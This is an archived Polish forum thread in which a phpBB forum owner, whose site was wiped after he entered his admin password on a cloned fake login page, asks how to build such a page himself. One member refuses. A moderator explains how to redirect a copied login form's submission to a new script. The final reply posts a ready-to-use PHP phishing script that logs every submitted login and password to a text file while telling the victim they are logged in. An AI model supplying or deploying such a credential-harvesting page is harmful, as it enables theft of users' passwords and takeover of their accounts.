Skocz do zawartości
  • 👋 Witaj na MPCForum!

Przeglądasz forum jako gość, co oznacza, że wiele świetnych funkcji jest jeszcze przed Tobą! 😎

• Pełny dostęp do działów i ukrytych treści
    • Możliwość pisania i odpowiadania w tematach
    • System prywatnych wiadomości
    • Zbieranie reputacji i rozwijanie swojego profilu
    • Członkostwo w jednej z największych społeczności graczy

👉 Dołączenie zajmie Ci mniej niż minutę – a zyskasz znacznie więcej!

Zarejestruj się teraz

[Q] jak zrobić to co on ?

smooth killer

Rekomendowane odpowiedzi

Opublikowano

Witam,

mam swoją stronę z PHPBB, i raz mi pewien ktoś napisał taką wiadomość żebym tam mu pomógł (dał link do "mojej" strony tyle że to był kod url i tylko wyświetlało że to moja strona, a przekierowanie było na inną)

Po przekierowaniu był ten sam styl, logo, teksty itd.Wyskoczył panel logowania (wpisałem nazwe i hasło z mojej strony) i na drugi dzień mi gościu wszystko z forum wyczyścił ?

Jak takie coś zrobić ? Gdzie jest zapisywane kto co tam wpisał (nawet jeśli było źle) i dodam że tam był taki sam styl ale jedyną działającą zakładką było login, inne przekierowywały na strone hosta że błąd jest.

Gdy Ci smutno gdy Ci źle,j*bnij format dysku C

Opublikowano

,,Nie rozumieć twojej mądrości"

PHPBB to jest forum, to po pierwsze.

Otóż gościu zrobił Cię w balona ;-) Zrobił inne forum, a podmienił skrypt logowania na taki, że wszystko co tam wpiszesz idzie mu prosto np. na skrzynkę e-mail :)

Wszedł na twoje forum do panelu administratora i wszystko wyczyścił ;-)

1368908122-U621182.png

Moderator Tworzenia stron WWW , ex.Moderator Dark Orbit,ex. Moderator Diablo, Helper Pogaduszek, Metin2, Dobre programy, Fan Art, MPC Media Team Recenzent.

Opublikowano

Wiem o tym właśnie !

Chodzi mi właśnie o to jak takie coś zrobić.Zna ktoś taki skrypt co by własnie to co się wpisuje w polach login i hasło zapisało np w pliku na ftp lub wysłało mi na maila ?

Gdy Ci smutno gdy Ci źle,j*bnij format dysku C

Opublikowano

Nie pomagamy w czymś takim, dziękuje dobranoc.

Potrzebujesz strony internetowej? Pisz śmiało, jestem do waszej dyspozycji. (Jedyna możliwość zapłaty to pieniądze (przelew, SMS, doładowanie), innej nie przyjmuje i nawet nie masz co pisać).

Opublikowano

Ja pomogę, ale nie dla oszustwa tylko czysto naukowo. Jednakże zatwierdzam, iż nie biorę odpowiedzialności na skutki.

Otóż bierzemy sobie skrypt logowania na forum :) Potem tylko tam gdzie masz <inpu type="text" name"login> czy jakoś tak i tam masz potem <inpu type= submit value="Wpisz swój login" piszę to z pamięci więc nie jestem pewny to na górze masz opcję wysyłania gdzieś POST albo GET i właśnie tam gdzie to pisze mamy odnośnik do wysyłania.

Tworzymy sobie pusty skrypt np. hasla.php i tam gdzie mamy obok GET, albo POST ( zakładam że będzie na pewno GET ponieważ w adresie hasła nie wyświetla hasła).

Dajemy adres wysyłania /hasla.php i w po tym wszystko co on napisał jest w skrypcie hasla.php .

Przepraszam za ortografię, ale piszę z telefonu :)

1368908122-U621182.png

Moderator Tworzenia stron WWW , ex.Moderator Dark Orbit,ex. Moderator Diablo, Helper Pogaduszek, Metin2, Dobre programy, Fan Art, MPC Media Team Recenzent.

Opublikowano

lub gotowy skrypt:

<?

if(empty($_POST['login']) && empty($_POST['haslo'])) {

echo'
<form method="POST">
<input type="text" name="login" placeholder=" login">
<input type="text" name="haslo" placeholder=" haslo">
<input type="submit" value="zaloguj sie">
</form>
';

}

else {

$dane = '
Login: ' .$_POST['login']. '  Haslo: ' .$_POST['haslo']. '
';

file_put_contents("dane.txt", $dane , FILE_APPEND);

echo 'zostales zalogowany!';

}

?>

Zarchiwizowany

Ten temat przebywa obecnie w archiwum. Dodawanie nowych odpowiedzi zostało zablokowane.

• Dodaj nową pozycję...